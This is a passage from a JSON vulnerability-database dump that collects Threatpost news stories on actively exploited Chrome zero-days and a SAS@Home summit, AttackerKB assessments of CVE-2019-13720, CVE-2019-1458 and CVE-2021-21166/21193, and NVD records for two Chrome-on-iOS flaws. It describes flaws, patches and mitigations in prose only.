elevation-of-privilege (CVE-2019-1458) on targets as well as to escape the Chrome process sandbox.\n\nAlso of note in the agenda are presentations from third-party researchers, including Joe FitzPatrick, researcher with Securing Hardware; Ryan Naraine, director of security strategy at Intel; Sounil Yu, CISO in residence at YL Ventures; and Alex Frappier, director of strategic partnerships with the CanCyber Foundation. 
Other third-party speakers are to be announced.\n\nFitzPatrick, who [spoke at last year\u2019s SAS event](<https://threatpost.com/sas-2019-joe-fitzpatrick-warns-of-the-5-supply-chain-attack/143684/>) in Singapore, will use his session on Tuesday, \u201cHardware Hacking Under Quarantine,\u201d to show off almost a dozen unique avenues where an attacker might access PCI express interfaces in a computer\u2019s hardware in order to mount a [direct memory access (DMA) attack](<https://threatpost.com/rambleed-side-channel-privileged-memory/145629/>) on the target system.\n\n\u201cUp to this point the majority of the research has been done against laptop, desktop and server systems through full-size PCI express ports or Thunderbolt ports,\u201d FitzPatrick told Threatpost. \u201cI quickly show a bunch of places, including on smaller embedded devices, where this can also be done.\u201d\n\nFitzPatrick\u2019s session will be in a pecha-kucha 20\u00d720 presentation format, where the speaker shows 20 images, each for 20 seconds, to tell a 400-second story with visuals guiding the way. Another pecha-kucha presentation will come from Kaspersky\u2019s David Jacoby, who [also spoke at last year\u2019s event](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>). For SAS@home, he\u2019ll be presenting on \u201cHow Does COVID-19 Affect the Internet?\u201d on Wednesday.\n\nCanCyber\u2019s Frappier meanwhile will be giving a deep-dive training Master Class on Thursday on the importance of body language. 
Specifically, he\u2019ll be discussing how red teams can use an understanding of nonverbal cues as a way to increase their chances of success while making impersonation or [\u201cvishing\u201d attacks](<https://threatpost.com/romanian-hackers-extradited-to-u-s-over-18m-vishing-scam/131763/>).\n\nFrappier told Threatpost that the subject is important in the context of today\u2019s threat landscape given that falling for social-engineering attacks is an enduring issue, and at the same time, video has become an important communication avenue in today\u2019s challenging times.\n\n\u201cWe have a difficult time reading people, and our adversaries are aware of this,\u201d he told Threatpost. \u201cYet, this is a two-way street. Better reading and understanding of the nonverbal will make us better at detecting important threats. Better encoding for our nonverbal message will allow us to become better communicators. We will get our message across and will get buy-in from managers and commercial partners.\u201d\n\nAs for the other planned sessions, Intel\u2019s Naraine will offer a Tuesday fireside chat on what cybersecurity could look like in a post-crisis world, on the other side of the pandemic. Kaspersky\u2019s Costin Raiu meanwhile will offer another Master Class (topic to be determined) on Wednesday; and on Thursday, Igor Kuznetsov of Kaspersky will present a session on \u201cStatic Binary Analysis: The Essentials.\u201d\n\nThe agenda will also feature a few surprise guests, according to conference organizers.\n\nYou can keep up with the event via Threatpost, which will be providing daily reports on the virtual conference.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. 
Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "modified": "2020-04-24T20:44:05", "published": "2020-04-24T20:44:05", "id": "THREATPOST:230DF95E70EB9C4F372C198798822D19", "href": "https://threatpost.com/sashome-virtual-summit-showcases-threat-intel/155128/", "type": "threatpost", "title": "SAS@Home Virtual Summit Showcases New Threat Intel, Industry Changes", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:42:49", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5869"], "description": "UPDATE\n\nGoogle is warning users of a high-severity vulnerability in its Chrome browser that is currently being exploited by attackers to hijack computers.\n\nThe flaw ([CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-13720>)), discovered by security researchers Anton Ivanov and Alexey Kulaev at Kaspersky, exists in Google Chrome\u2019s audio component. Google is urging users to update to the latest version of Chrome, 78.0.3904.87 (for Windows, Mac, and Linux) as it rolls out over the coming days.\n\n\u201cThis [updated] version addresses vulnerabilities that an attacker could exploit to take control of an affected system,\u201d according to a Thursday Cybersecurity and Infrastructure Security Agency [(CISA) alert](<https://www.us-cert.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome>). \u201cOne of these vulnerabilities (CVE-2019-13720) was detected in exploits in the wild.\u201d\n\nThe bug (CVE-2019-13720) is a use-after-free flaw, which is a memory corruption flaw where an attempt is made to access memory after it has been freed. 
This can cause an array of malicious impacts, from causing a program to crash, to potentially leading to execution of arbitrary code \u2013 or even enabling full remote code execution capabilities.\n\nCostin Raiu, director of Global Research and Analysis Team at Kaspersky, [wrote on Twitter](<https://twitter.com/craiu/status/1190260465139691522>) \u201ca few days ago our technologies caught a new Chrome 0day exploit used in the wild and we reported it to Google.\u201d\n\n> A few days ago our technologies caught a new Chrome 0day exploit used in the wild and we reported it to Google. Just released-Chrome 78 patches it, credits to my colleagues [@antonivanovm](<https://twitter.com/antonivanovm?ref_src=twsrc%5Etfw>) and Alexey Kulaev for finding the bug. <https://t.co/Bgm0QtNO2d>\n> \n> \u2014 Costin Raiu (@craiu) [November 1, 2019](<https://twitter.com/craiu/status/1190260465139691522?ref_src=twsrc%5Etfw>)\n\nKaspersky researchers are calling the exploits [Operation WizardOpium](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>). The attack leveraged a waterhole-style injection on a Korean-language news portal, they said.\n\nMalicious JavaScript code was inserted in the main page, which then loaded a profiling script from a remote site. Researchers said that the exploit \u201cused a race condition bug between two threads due to missing proper synchronization between them. It gives an attacker a Use-After-Free condition that is very dangerous because it can lead to code execution scenarios.\u201d\n\n\u201cSo far, we have been unable to establish a definitive link with any known threat actors,\u201d they said in a Friday analysis. \u201cThere are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. 
The profile of the targeted website is more in line with earlier [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) attacks that have recently deployed similar false flag attacks.\u201d\n\nGoogle and researchers remain intentionally tight-lipped. \u201cAccess to bug details and links may be kept restricted until a majority of users are updated with a fix,\u201d according to [Google\u2019s alert](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>). \u201cWe will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d Google said in its advisory.\n\n[Use-after-free flaws](<https://threatpost.com/tag/use-after-free/>) have plagued Google\u2019s Chrome browser recently. In [August](<https://threatpost.com/google-high-severity-blink-browser-engine-flaw/147770/>), Google disclosed a high-severity use-after-free vulnerability (CVE-2019-5869) in Blink, an open-source [browser engine](<https://www.chromium.org/blink>) that powers the Google Chrome browser, that could enable remote attackers to execute code and carry out other malicious attacks.\n\nGoogle on Thursday also disclosed another high-severity vulnerability (CVE-2019-13721) in PDFium, which was developed by Foxit and Google and provides developers with an open-source software library for viewing and searching PDF documents.\n\nThis flaw is also a use-after-free vulnerability, but there are no reports of it being exploited in the wild. It was disclosed by a researcher under the alias \u201cbanananapenguin\u201d who received a $7500 bounty through Google\u2019s vulnerability disclosure program for the discovery.\n\n_This post was updated on Nov. 1 at 4pm EST to reflect further details about the detected exploit._\n\n_**What are the top mistakes leading to data breaches at modern enterprises? 
Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "modified": "2019-11-01T15:35:03", "published": "2019-11-01T15:35:03", "id": "THREATPOST:74F8E9B3D3CB64CAF2AF0B54DE29C9A6", "href": "https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/", "type": "threatpost", "title": "Google Discloses Chrome Flaw Exploited in the Wild", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-21T12:26:16", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-6418"], "description": "Google released an [update](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) to its Chrome browser that patches a zero-day vulnerability in the software\u2019s FreeType font rendering library that was actively being exploited in the wild.\n\nSecurity researcher Sergei Glazunov of [Google Project Zero](<https://googleprojectzero.blogspot.com/>) discovered [the bug](<https://twitter.com/benhawkes/status/1318640422571266048>), which is classified as a type of memory-corruption flaw called a heap buffer overflow in FreeType. Glazunov informed Google of the vulnerability on Monday. 
Project Zero is an internal security team at the company aimed at finding zero-day vulnerabilities.\n\nBy Tuesday, Google already had released a stable channel update, Chrome version 86.0.4240.111, that deploys five security fixes for Windows, Mac and Linux \u2013 among them a fix for the zero-day, which is being tracked as CVE-2020-15999 and is rated as high risk.\n\n\u201cGoogle is aware of reports that an exploit for CVE-2020-15999 exists in the wild,\u201d Prudhvikumar Bommana of the Google Chrome team wrote in a [blog post](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) announcing the update Tuesday. Google did not reveal further details of the active attacks that researchers observed.\n\n[Andrew R. Whalley](<https://twitter.com/arw>), a member of the Chrome security team, gave his team kudos on [Twitter](<https://twitter.com/arw/status/1318640817762807810>) for the \u201csuper-fast\u201d response to the zero-day.\n\nStill, Ben Hawkes, technical lead for the Project Zero team, warned that while Google researchers only observed the Chrome exploit, it\u2019s possible that other implementations of FreeType might be vulnerable as well since Google was so quick in its response to the bug. He referred users to a [fix](<https://savannah.nongnu.org/bugs/?59308>) by Glazunov posted on the FreeType Project page and urged them to update other potentially vulnerable software.\n\n\u201cThe fix is also in today\u2019s stable release of FreeType 2.10.4,\u201d Hawkes [tweeted](<https://twitter.com/benhawkes/status/1318640423485624320>).\n\nMeanwhile, security researchers took to Twitter to encourage people to update their Chrome browsers immediately to avoid falling victim to attackers aiming to exploit the flaw.\n\n\u201cMake sure you update your Chrome today! 
(restart it!),\u201d [tweeted](<https://twitter.com/securestep9/status/1318679358840754176>) London-based application security consultant Sam Stepanyan.\n\nIn addition to the FreeType zero-day, Google patched four other bugs \u2013 three of high risk and one of medium risk \u2013 in the Chrome update released this week.\n\nThe high-risk vulnerabilities are: CVE-2020-16000, described as \u201cinappropriate implementation in Blink;\u201d CVE-2020-16001, described as \u201cuse after free in media;\u201d and CVE-2020-16002, described as \u201cuse after free in PDFium,\u201d according to the blog post. The medium-risk bug is being tracked as CVE-2020-16003, described as \u201cuse after free in printing,\u201d Bommana wrote.\n\nSo far in the last 12 months Google has patched three zero-day vulnerabilities in its Chrome browser. Prior to this week\u2019s FreeType disclosure, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n", "modified": "2020-10-21T12:23:29", "published": "2020-10-21T12:23:29", "id": "THREATPOST:6F7E512F15913694CF17A906715FE678", "href": "https://threatpost.com/google-patches-zero-day-browser/160393/", "type": "threatpost", "title": "Google Patches Actively-Exploited Zero-Day Bug in Chrome Browser", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-04T20:29:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2020-14750", "CVE-2020-15999", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16011", "CVE-2020-6418"], "description": "Flaws in Google\u2019s Chrome desktop and Android-based browsers 
were patched Monday in an effort to prevent known exploits from being used by attackers. Two separate security bulletins issued by Google warned that it is aware of reports that exploits for both exist in the wild. Google\u2019s Project Zero went one step further and asserted that both bugs are actively being exploited.\n\nIn its [Chrome browser update](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) for Windows, Mac and Linux, Google said that version 86.0.4240.183 fixes 10 vulnerabilities. One of them, tracked as CVE-2020-16009, is the most troubling: it is rated high-severity and is one of the two with active exploits. The vulnerability is tied to Google\u2019s open source JavaScript and WebAssembly engine called V8. In its disclosure, the flaw is described as an \u201cinappropriate implementation in V8\u201d.\n\nClement Lecigne of Google\u2019s Threat Analysis Group and Samuel Gross of Google Project Zero discovered the Chrome desktop bug on Oct. 29, according to a [blog post](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) announcing the fixes by Prudhvikumar Bommana of the Google Chrome team. If exploited, the V8 bug can be used for remote code execution, according to a separate analysis by Project Zero\u2019s team.\n\nAs for the Android OS-based Chrome browser, also with an active exploit in the wild, Google warned [on Monday](<https://chromereleases.googleblog.com/2020/11/chrome-for-android-update.html>) of a sandbox escape bug (CVE-2020-16010). This vulnerability is rated high-severity and opened up a possible attack based on \u201cheap buffer overflow in UI on Android\u201d conditions. Credited for discovering the bug on Oct. 
31 are Maddie Stone, Mark Brand and Sergei Glazunov of Google Project Zero.\n\n## **\u2018Actively Exploited in the Wild\u2019**\n\nGoogle said it was withholding the technical details of both bugs, pending the distribution of patches to affected endpoints. While Google said publicly known exploits existed for both bugs, it did not indicate that either one was under active attack. Google\u2019s own Project Zero technical lead Ben Hawkes tweeted on Monday that both were under active attack.\n\n\u201cToday Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android,\u201d he wrote.\n\n> Today Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android. <https://t.co/IOhFwT0Wx1>\n> \n> \u2014 Ben Hawkes (@benhawkes) [November 2, 2020](<https://twitter.com/benhawkes/status/1323374326150701057?ref_src=twsrc%5Etfw>)\n\nAs a precaution, Google said in its security update that it would \u201calso retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d according to the post.\n\n## **The Other Android Bugs**\n\nThe new Chrome Android release also includes stability and performance improvements, according to the Google Chrome team.\n\nVulnerabilities patched in the Chrome desktop update included a \u201cuse after free\u201d bug (CVE-2020-16004); an \u201cinsufficient policy enforcement in ANGLE\u201d flaw (CVE-2020-16005); an \u201cinsufficient data validation in installer\u201d issue (CVE-2020-16007) and a \u201cstack buffer overflow in WebRTC\u201d bug (CVE-2020-16008). 
Lastly, Google reported a \u201cheap buffer overflow in UI on Windows\u201d tracked as CVE-2020-16011.\n\nThis week\u2019s Chrome updates come on the heels of a zero-day bug [reported and patched last week](<https://threatpost.com/google-patches-zero-day-browser/160393/>) by Google affecting Chrome on Windows, Mac and Linux. The flaw (CVE-2020-15999), rated high-risk, is a vulnerability in Chrome\u2019s FreeType font rendering library.\n\nThe latest vulnerabilities mean that in just over 12 months Google has patched a string of serious vulnerabilities in its Chrome browser. In addition to the three most recently reported flaws, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://www.zdnet.com/article/halloween-scare-google-discloses-chrome-zero-day-exploited-in-the-wild/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar ](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>)on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. 
EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "modified": "2020-11-03T17:23:23", "published": "2020-11-03T17:23:23", "id": "THREATPOST:DF87733B74489628AB9F2C89704380A9", "href": "https://threatpost.com/chrome-holes-actively-targeted/160890/", "type": "threatpost", "title": "Two Chrome Browser Updates Plug Holes Actively Targeted by Exploits", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-04-07T15:16:36", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2021-21166"], "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 08, 2021 5:47pm UTC reported:\n\nReported as exploited in the wild at <https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>.\n\nDetails are still scant on this vulnerability as they are being withheld by Google until more people have patched the issue, which was fixed in Chrome 89.0.4389.72. All that we know is that the bug is labeled as an `Object lifecycle issue in audio` and was found by `Alison Huffman, Microsoft Browser Vulnerability Research on 2021-02-11`.\n\nGiven the description of this vulnerability as well as its link to a similar vulnerability exploited in the wild in the past (see <https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>), it\u2019s likely that this is a UAF vulnerability. 
Given the one used in <https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/> was a bug in the same component which was then used in the WizardOpium attacks, it\u2019s likely that this vulnerability will lead to full compromise of the system given past history.\n\nUsers are encouraged to disable JavaScript where possible, particularly for untrusted sites, as this is often needed in order to successfully exploit UAF vulnerabilities in the browser. However, this is only a temporary fix, and it is strongly encouraged that users instead upgrade to Chrome 89.0.4389.72 or later. Given there is already active exploitation of this vulnerability, and given the history of bugs within this component, there is a good possibility that we may see more widespread exploitation of this issue in the near future.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 3\n", "modified": "2021-03-12T00:00:00", "published": "2021-03-09T00:00:00", "id": "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9", "href": "https://attackerkb.com/topics/VffVzAAdhq/cve-2021-21166", "type": "attackerkb", "title": "CVE-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-22T06:10:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the Internet. Successful exploitation of the most severe vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser. Depending on the privileges associated with the application, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. 
If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\n\nUse after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**busterb** at November 01, 2019 6:45pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak and heap grooming; the malware deployed via watering-hole injection on a Korean-language news portal establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 2\n\n**space-r7** at November 01, 2019 7:32pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak and heap grooming; the malware deployed via watering-hole injection on a Korean-language news portal establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. 
Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 2\n\n**gwillcox-r7** at November 22, 2020 2:51am UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak and heap grooming; the malware deployed via watering-hole injection on a Korean-language news portal establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n", "modified": "2020-10-13T00:00:00", "published": "2019-10-10T00:00:00", "id": "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "href": "https://attackerkb.com/topics/EfbjmUx1X2/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium", "type": "attackerkb", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-07T21:16:02", "bulletinFamily": "info", "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "description": "Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 15, 2021 6:18am UTC reported:\n\nReported as exploited in the wild at <https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>.\n\nThis bug seems to have scarce details from what I can tell online, however it appears to 
be a UAF bug within Blink that was reported by an anonymous researcher on 2021-03-09. The details for this bug are currently locked so that only Google employees can access it, but should it be opened to the public the details will be at <https://bugs.chromium.org/p/chromium/issues/detail?id=1186287>.\n\nAs per usual, the advice to protect against UAF bugs in browsers is to disable JavaScript on untrusted websites via a plugin such as NoScript. Since most UAFs require JavaScript to be enabled to conduct exploitation, this will act as an effective mitigation in most cases, but users should not rely on this as their sole protection mechanism.\n\nIt is interesting to see that this is the third 0day exploited in the wild this year in Chrome, alongside CVE-2021-21166, an object lifecycle issue in the audio component, and CVE-2021-21148, a heap buffer overflow within the V8 scripting engine. Time will tell whether this trend continues, but it is interesting to see such a regular cadence of vulnerabilities being exploited in the wild.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2021-03-24T00:00:00", "published": "2021-03-16T00:00:00", "id": "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "href": "https://attackerkb.com/topics/ACMmdhOpt2/cve-2021-21193", "type": "attackerkb", "title": "CVE-2021-21193", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:36:55", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka \u2018Win32k Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 19, 2020 5:31pm UTC reported:\n\nKnown as WizardOpium for its use in the WizardOpium attacks, and first written about by Kaspersky Labs. 
The writeup by Kaspersky Labs can be found at <https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/> which shows that this vulnerability was used in conjunction with CVE-2019-13720, which was a 0day in the Chrome browser at the time that occurred due to a race condition between two threads.\n\nIn the WizardOpium attacks, the Chrome vulnerability, aka CVE-2019-13720, was first used to gain an arbitrary read/write primitive in the Chrome render process that led to arbitrary code execution as the Chrome render (read more on this at <https://bugs.chromium.org/p/chromium/issues/detail?id=888923> if you\u2019re interested). However, this still left attackers with a problem: they needed some way to escape the Chrome render\u2019s sandbox if they wanted to get persistent access to the target.\n\nThis is where CVE-2019-1458 came in. Looking at the advisory at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458> we can see this vulnerability affected quite a wide range of targets, going all the way from Windows 7 up to Windows 10 v1607. Later versions of Windows 10 are not affected, however.\n\nIf one dives around the internet a little bit more though, they will stumble across <https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html>, which was written by the Project Zero team at Google and explains the vulnerability quite well. In essence there is an Uninitialized Variable error in Windows within its Windows Switching code, whereby the field `*(gpsi + 0x154)` in the global structure `tagSERVERINFO`, which describes system windows (such as menus, desktops, switch windows, etc), was not properly initialized at the start of a function, which allowed user mode code to set extra window data in a task switch window of Window class `FNID_SWITCH`, or `0x280`, which can normally only be set by the kernel. 
Even worse though is the fact that this extra window data is essentially a pointer which is then dereferenced and then written to, which grants the attacker a limited arbitrary write primitive in kernel mode, which they can then use to perform limited controlled writes to kernel memory and take over the system. Attackers then used this limited kernel write primitive to overwrite their current process\u2019s access token value with the value of the SYSTEM process\u2019s access token value, thereby allowing them to execute code as SYSTEM.\n\nIf one then looks at <https://github.com/piotrflorczyk/cve-2019-1458_POC>, which does a deep technical dive into all of the details of this vulnerability, one can see that the affected function was `InitFunctionTables()` within `win32k.sys`, which didn\u2019t appropriately initialize the fields `*(gpsi+0x14E)`, `*(gpsi+0x154)`, and `*(gpsi+0x180)`, despite initializing other fields within the same structure. Microsoft\u2019s patch ensured that these fields were all set up and initialized with appropriate values at the start of the `InitFunctionTables()` call, thus preventing this issue from occurring.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2020-07-24T00:00:00", "published": "2019-12-10T00:00:00", "id": "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "href": "https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458", "type": "attackerkb", "title": "CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-04-05T12:39:33", "description": "Insufficient data validation in Chrome on iOS in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": 
"NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21164", "type": "cve", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-04-05T02:15:00", "cpe": ["cpe:/o:fedoraproject:fedora:32"], "id": "CVE-2021-21164", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21164", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-08T13:40:59", "description": "Insufficient data validation in Reader Mode in Google Chrome on iOS prior to 89.0.4389.72 allowed a remote attacker to leak cross-origin data via a crafted HTML page and a malicious server.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-09T18:15:00", "title": "CVE-2021-21163", "type": "cve", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", 
